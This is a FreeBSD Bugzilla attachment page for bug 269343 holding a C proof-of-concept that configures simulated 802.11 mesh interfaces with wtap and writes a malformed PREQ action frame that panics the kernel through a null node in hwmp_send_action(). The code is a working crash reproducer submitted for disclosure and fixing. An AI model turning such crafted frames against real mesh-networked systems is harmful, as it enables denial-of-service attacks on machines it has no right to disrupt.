FreeBSD Bugzilla – Attachment 239923 Details for
Bug 269343
bad 802.11 mesh PREQ packet can generate panic: null node from hwmp_send_action()
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
generate an 802.11 mesh action PREQ frame that causes panic: null node
wtap19c.c (text/plain), 1.98 KB, created by
Robert Morris
on 2023-02-05 18:22:18 UTC
(
hide
)
Description:
generate an 802.11 mesh action PREQ frame that causes panic: null node
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-02-05 18:22:18 UTC
Size:
1.98 KB
patch
obsolete
>#include <stdio.h> >#include <stdlib.h> >#include <unistd.h> >#include <signal.h> >#include <string.h> >#include <fcntl.h> >#include <sys/resource.h> >#include <sys/socket.h> >#include <netinet/in.h> >#include <sys/resource.h> >#include <net80211/ieee80211.h> >#include <sys/ioctl.h> >#include <net/if.h> >#include <net80211/ieee80211_ioctl.h> > >unsigned long long aa[] = { >0x4300ull, >0x0ull, >0x1f000000000000ull, >0x40e07cfef2ull, >0x0ull, >0x0ull, >0x6567ff00ull, >0x42a37d000000ull, >0x80000000000000ull, >0x0ull, >0xf9000000000000ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >0x0ull, >}; >int aai; > >int >main() { > struct rlimit r; > r.rlim_cur = r.rlim_max = 0; > setrlimit(RLIMIT_CORE, &r); > > system("kldload wtap"); > > // /usr/src/tools/tools/wtap/wtap/wtap.c > system("/wtap c 0"); > > system("ifconfig wlan0 create wlanmode mesh wlandev wtap0 meshid x"); > > system("ifconfig wlan0 inet 1.1.1.1/24 up"); > > system("/wtap c 1"); > system("ifconfig wlan1 create wlanmode mesh wlandev wtap1 meshid x"); > system("ifconfig wlan1 inet 1.1.1.2/24 up"); > > system("/vis_map o"); > system("/vis_map a 0 1"); > system("/vis_map a 1 0"); > > sleep(5); > > int fd = open("/dev/wlan0", 1); > if(fd < 0){ > perror("/dev/wlan0"); > exit(1); > } > > char buf[256]; > memset(buf, 0xff, sizeof(buf)); > > for(int i = 0; i+8 <= sizeof(buf); i += 8) > *(long long *)(buf + i) ^= aa[aai++]; > > struct ieee80211_frame *wh = (void *) buf; > > wh->i_fc[0] = IEEE80211_FC0_TYPE_MGT | > IEEE80211_FC0_SUBTYPE_ACTION; > > // dst > wh->i_addr1[0] = 0x00; > wh->i_addr1[1] = 0x98; > wh->i_addr1[2] = 0x9a; > wh->i_addr1[3] = 0x98; > wh->i_addr1[4] = 0x96; > wh->i_addr1[5] = 0x97; > > // src > wh->i_addr2[0] = 0x00; > wh->i_addr2[1] = 0x98; > wh->i_addr2[2] = 0x9a; > wh->i_addr2[3] = 0x98; > wh->i_addr2[4] = 0x96; > wh->i_addr2[5] = 0x98; > > system("sysctl -w net.wlan.0.debug=0xffffffff"); > > if(write(fd, buf, sizeof(buf)) < 0) > perror("write"); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=239923">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 269343
: 239923